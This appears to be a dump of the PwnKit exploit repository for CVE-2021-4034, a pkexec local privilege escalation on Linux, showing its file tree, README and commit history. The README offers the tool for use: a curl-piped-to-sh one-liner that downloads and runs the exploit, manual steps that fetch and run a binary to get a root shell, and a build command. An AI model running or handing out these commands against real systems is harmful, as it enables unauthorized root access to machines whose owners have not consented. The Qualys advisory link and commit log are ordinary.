======================: FILES :======================
.
├── imgs
│   ├── exploit.png
│   ├── oneliner.png
│   └── patched.png
├── LICENSE
├── PwnKit
├── PwnKit.c
├── PwnKit.sh
└── README.md

1 directory, 8 files
======================: README CONTENT :======================
# PwnKit

Self-contained exploit for CVE-2021-4034 - Pkexec Local Privilege Escalation

## Usage

Should work out of the box on vulnerable Linux distributions based on Ubuntu, Debian, Fedora, and CentOS.

```bash
sh -c "$(curl -fsSL https://raw.githubusercontent.com/ly4k/PwnKit/main/PwnKit.sh)"
```

![](./imgs/oneliner.png)

### Manually

```bash
curl -fsSL https://raw.githubusercontent.com/ly4k/PwnKit/main/PwnKit -o PwnKit
chmod +x ./PwnKit
./PwnKit # interactive shell
./PwnKit 'id' # single command
```

![](./imgs/exploit.png)

### Patched

Running the exploit against patched versions will yield the following output.

![](./imgs/patched.png)

### Build

```bash
gcc -shared PwnKit.c -o PwnKit -Wl,-e,entry -fPIC
```

## Technical Details

- https://blog.qualys.com/vulnerabilities-threat-research/2022/01/25/pwnkit-local-privilege-escalation-vulnerability-discovered-in-polkits-pkexec-cve-2021-4034

## References

- https://github.com/arthepsy/CVE-2021-4034/====================== GIT HISTORY: ======================
940be36 HEAD@{0}: clone: from https://github.com/idanmos/PwnKit
commit 940be363eef8bc1556dca453297d802a328f8d7c
Author: Oliver Lyak ly4k <53348818+ly4k@users.noreply.github.com>
Date:   Thu Jan 27 21:09:20 2022 +0100

    minor cleanup

commit 445c73f7e81ca89528f3e15148a1a747fb9d65db
Author: Oliver Lyak ly4k <53348818+ly4k@users.noreply.github.com>
Date:   Thu Jan 27 21:03:46 2022 +0100

    added exit on failure

commit cdf274ce186ad0f380547f42afeb82a9b80e1e43
Author: Oliver Lyak ly4k <53348818+ly4k@users.noreply.github.com>
Date:   Thu Jan 27 20:57:14 2022 +0100

    updated readme

commit 2a87d76fc3f66f7ba69eac28eaa5f0570aeb0a34
Author: Oliver Lyak ly4k <53348818+ly4k@users.noreply.github.com>
Date:   Thu Jan 27 20:43:49 2022 +0100

    change bash to sh in readme

commit f1728c9e211839b0f38a788745685f85025cbaa7
Author: Oliver Lyak ly4k <53348818+ly4k@users.noreply.github.com>
Date:   Thu Jan 27 20:38:48 2022 +0100

    Various improvements
    - check if exploit failed
    - run a single command
    - curl oneliner

commit 4bca1e6504467f351805cac9555113d1082cb4e8
Author: ly4k <53348818+ly4k@users.noreply.github.com>
Date:   Thu Jan 27 12:35:57 2022 +0100

    Cleaned up
    Used symlinks instead of copying self over
    Remove artifact folders in case the exploit didn't work

commit 0b4fb44df83a43afadd2fb06d9e0fc4c2d5dad65
Author: ly4k <53348818+ly4k@users.noreply.github.com>
Date:   Wed Jan 26 15:28:42 2022 +0100

    initial release

commit b55befb2cc347e1066cab616ac95a504952d56bb
Author: Oliver Lyak <53348818+ly4k@users.noreply.github.com>
Date:   Wed Jan 26 15:26:10 2022 +0100

    Initial commit
